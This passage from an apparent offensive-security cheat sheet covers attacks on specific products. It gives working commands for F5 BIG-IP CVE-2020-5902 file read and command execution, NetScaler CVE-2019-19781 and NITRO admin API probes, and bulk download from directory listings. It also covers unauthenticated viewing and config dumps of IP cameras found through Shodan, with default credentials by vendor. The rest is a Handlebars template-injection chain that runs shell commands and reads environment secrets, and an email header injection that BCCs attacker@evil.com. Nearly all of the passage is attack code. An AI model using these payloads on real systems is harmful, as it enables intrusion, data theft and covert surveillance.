&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:15672/api/overview&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# No auth → full access&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2619-f5-big-ip--cve-2020-5902-rce" &gt;
&lt;div&gt;
&lt;a href="#2619-f5-big-ip--cve-2020-5902-rce"&gt;
##
&lt;/a&gt;
26.19 F5 BIG-IP — CVE-2020-5902 RCE
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;If you detect F5 BIG-IP (&lt;code&gt;TS*&lt;/code&gt; cookies, &lt;code&gt;BigIP&lt;/code&gt; server):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Detect F5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;server:\|set-cookie&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Server: BigIP, cookies TS01*, TSa*&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Test CVE-2020-5902 (CVSS 10.0)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# File read:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# RCE:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+all&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2620-directory-listing--port-scanning-passive" &gt;
&lt;div&gt;
&lt;a href="#2620-directory-listing--port-scanning-passive"&gt;
##
&lt;/a&gt;
26.20 Directory Listing — Port Scanning Passive
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Servers with active directory listing expose ALL files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Common ports that may have directory listing:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; port in &lt;span style="color:#ef9f76"&gt;80&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;8080&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;8085&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;8443&lt;/span&gt; 9000; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -s -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;Port &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$port&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: %{size_download}b - %{http_code}\n&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET_IP:&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$port&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If it returns HTML with a file list → extract everything:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET_IP:8085/&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;href=&amp;#34;[^&amp;#34;]+&amp;#39;&lt;/span&gt; | cut -d&lt;span style="color:#a6d189"&gt;&amp;#39;&amp;#34;&amp;#39;&lt;/span&gt; -f2 | &lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; &lt;span style="color:#99d1db"&gt;read&lt;/span&gt; f; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; !&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; !&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;..&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; curl -s -o &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET_IP:8085/&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2621-ip-cameras--recon--exploitation" &gt;
&lt;div&gt;
&lt;a href="#2621-ip-cameras--recon--exploitation"&gt;
##
&lt;/a&gt;
26.21 IP Cameras — Recon &amp;amp; Exploitation
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;IP cameras are the most exposed IoT device on the Brazilian internet (~100K). Most have endpoints without authentication.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Discovery via Shodan&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shodan stats --facets org:20 &lt;span style="color:#a6d189"&gt;&amp;#39;country:BR port:554&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shodan search &lt;span style="color:#a6d189"&gt;&amp;#39;country:BR port:554 has_screenshot:true&amp;#39;&lt;/span&gt; --limit &lt;span style="color:#ef9f76"&gt;100&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Axis — Snapshot and stream WITHOUT authentication&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:8010/axis-cgi/jpg/image.cgi&amp;#34;&lt;/span&gt; -o snapshot.jpg
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:8010/axis-cgi/mjpg/video.cgi&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# MJPEG live stream&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Axis — Full config dump (988 parameters!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:8010/axis-cgi/admin/param.cgi?action=list&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Serial, firmware, resolution, SD card, PTZ, licenses, network&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. ONVIF discovery&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:80/onvif/device_service&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. RTSP stream (usually requires auth)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ffplay &lt;span style="color:#a6d189"&gt;&amp;#34;rtsp://IP:554/axis-media/media.amp&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 6. Intelbras / HNAP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP/info/Login.html&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Login page&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP/HNAP1/&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# HNAP API (GetDeviceSettings)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 7. Default credentials by manufacturer&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Axis: root/pass, root/admin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Hikvision: admin/12345, admin/admin12345&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Dahua: admin/admin, admin/888888&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Intelbras: admin/admin, admin/(empty)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Foscam: admin/(empty)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Axis P1378-LE with 2019 firmware (6 years old):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Public snapshot without auth → real-time viewing&lt;/li&gt;
&lt;li&gt;Full config dump (988 parameters) with serial, licenses, SD card&lt;/li&gt;
&lt;li&gt;2 interfaces web (8010 Apache, 8011 Angular)&lt;/li&gt;
&lt;li&gt;99,428 cameras exposed in Brazil via Shodan&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="2622-sendgridemail-template-ssti-handlebars-injection" &gt;
&lt;div&gt;
&lt;a href="#2622-sendgridemail-template-ssti-handlebars-injection"&gt;
##
&lt;/a&gt;
26.22 SendGrid/Email Template SSTI (Handlebars Injection)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;SendGrid Dynamic Templates use Handlebars. If user input reaches the template without sanitization:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Payload for RCE via Handlebars SSTI in email templates:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{{constructor.constructor(&lt;span style="color:#a6d189"&gt;&amp;#39;return process.env&amp;#39;&lt;/span&gt;)()}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Full chain for command execution:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{{&lt;span style="color:#e78284"&gt;#&lt;/span&gt;&lt;span style="color:#e78284"&gt;with&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;s&amp;#34;&lt;/span&gt; as &lt;span style="color:#99d1db;font-weight:bold"&gt;|&lt;/span&gt;string&lt;span style="color:#99d1db;font-weight:bold"&gt;|&lt;/span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;#&lt;/span&gt;&lt;span style="color:#e78284"&gt;with&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;e&amp;#34;&lt;/span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;#&lt;/span&gt;&lt;span style="color:#e78284"&gt;with&lt;/span&gt; split as &lt;span style="color:#99d1db;font-weight:bold"&gt;|&lt;/span&gt;conslist&lt;span style="color:#99d1db;font-weight:bold"&gt;|&lt;/span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#ca9ee6"&gt;this&lt;/span&gt;.pop}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#ca9ee6"&gt;this&lt;/span&gt;.push (lookup string.sub &lt;span style="color:#a6d189"&gt;&amp;#34;constructor&amp;#34;&lt;/span&gt;)}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#ca9ee6"&gt;this&lt;/span&gt;.pop}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;#&lt;/span&gt;&lt;span style="color:#e78284"&gt;with&lt;/span&gt; string.split as &lt;span style="color:#99d1db;font-weight:bold"&gt;|&lt;/span&gt;codelist&lt;span style="color:#99d1db;font-weight:bold"&gt;|&lt;/span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#ca9ee6"&gt;this&lt;/span&gt;.pop}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#ca9ee6"&gt;this&lt;/span&gt;.push &lt;span style="color:#a6d189"&gt;&amp;#34;return require(&amp;#39;child_process&amp;#39;).execSync(&amp;#39;whoami&amp;#39;)&amp;#34;&lt;/span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#ca9ee6"&gt;this&lt;/span&gt;.pop}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;#&lt;/span&gt;each conslist}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;#&lt;/span&gt;&lt;span style="color:#e78284"&gt;with&lt;/span&gt; (string.sub.apply &lt;span style="color:#ef9f76"&gt;0&lt;/span&gt; codelist)}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#ca9ee6"&gt;this&lt;/span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;/with}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;/each}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;/with}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;/with}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;/with}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{{&lt;span style="color:#e78284"&gt;/with}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2623-smtp-header-injection-via-api-0a-crlf" &gt;
&lt;div&gt;
&lt;a href="#2623-smtp-header-injection-via-api-0a-crlf"&gt;
##
&lt;/a&gt;
26.23 SMTP Header Injection via API (%0A CRLF)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Email sending APIs that don&amp;rsquo;t sanitize fields may allow header injection:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-json" data-lang="json"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Add CC/BCC via newline injection in the &amp;#34;to&amp;#34; field:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#e78284"&gt;POST&lt;/span&gt; &lt;span style="color:#e78284"&gt;/v&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;3&lt;/span&gt;&lt;span style="color:#e78284"&gt;/mail/send&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;&amp;#34;personalizations&amp;#34;&lt;/span&gt;: [{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;&amp;#34;to&amp;#34;&lt;/span&gt;: [{&lt;span style="color:#ca9ee6"&gt;&amp;#34;email&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;victim@target.com%0ACc:attacker@evil.com%0ABcc:attacker2@evil.com&amp;#34;&lt;/span&gt;}]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;&amp;#34;from&amp;#34;&lt;/span&gt;: {&lt;span style="color:#ca9ee6"&gt;&amp;#34;email&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;noreply@target.com&amp;#34;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;&amp;#34;subject&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;test&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;&amp;#34;content&amp;#34;&lt;/span&gt;: [{&lt;span style="color:#ca9ee6"&gt;&amp;#34;type&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;text/plain&amp;#34;&lt;/span&gt;, &lt;span style="color:#ca9ee6"&gt;&amp;#34;value&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;test&amp;#34;&lt;/span&gt;}]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// → Email sent to the victim + CC + BCC to the attacker
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Also test in fields: subject, from_name, reply_to, custom_args
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Detection&lt;/strong&gt;: Send &lt;code&gt;%0A&lt;/code&gt;, &lt;code&gt;%0D%0A&lt;/code&gt;, &lt;code&gt;\r\n&lt;/code&gt;, &lt;code&gt;\n&lt;/code&gt; in all input fields of email APIs.&lt;/p&gt;
&lt;h3 id="2624-netscaler-citrix-adc--attack-surface" &gt;
&lt;div&gt;
&lt;a href="#2624-netscaler-citrix-adc--attack-surface"&gt;
##
&lt;/a&gt;
26.24 NetScaler (Citrix ADC) — Attack Surface
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Identify NetScaler&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;citrix\|netscaler&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Set-Cookie: NSC_*, Server: Citrix-ADC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. CVE-2019-19781 — Directory traversal to RCE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/vpns/portal/scripts/newbm.pl&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/vpns/portal/scripts/rmbm.pl&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk --path-as-is &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/vpn/../vpns/portal/scripts/newbm.pl&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. NITRO REST API (admin)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/nitro/v1/config/vpnvserver&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/nitro/v1/config/systemuser&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/nitro/v1/config/sslcertkey&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Default credentials: nsroot/nsroot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. SAML XXE (if SAML auth is configured)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Inject an XXE payload inside &amp;lt;samlp:AuthnRequest&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2625-source-code-audit--insecure-python-patterns" &gt;
&lt;div&gt;
&lt;a href="#2625-source-code-audit--insecure-python-patterns"&gt;
##
&lt;/a&gt;
26.25 Source Code Audit — Insecure Python Patterns
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Python code patterns indicating vulnerabilities during source code audit:&lt;/p&gt;
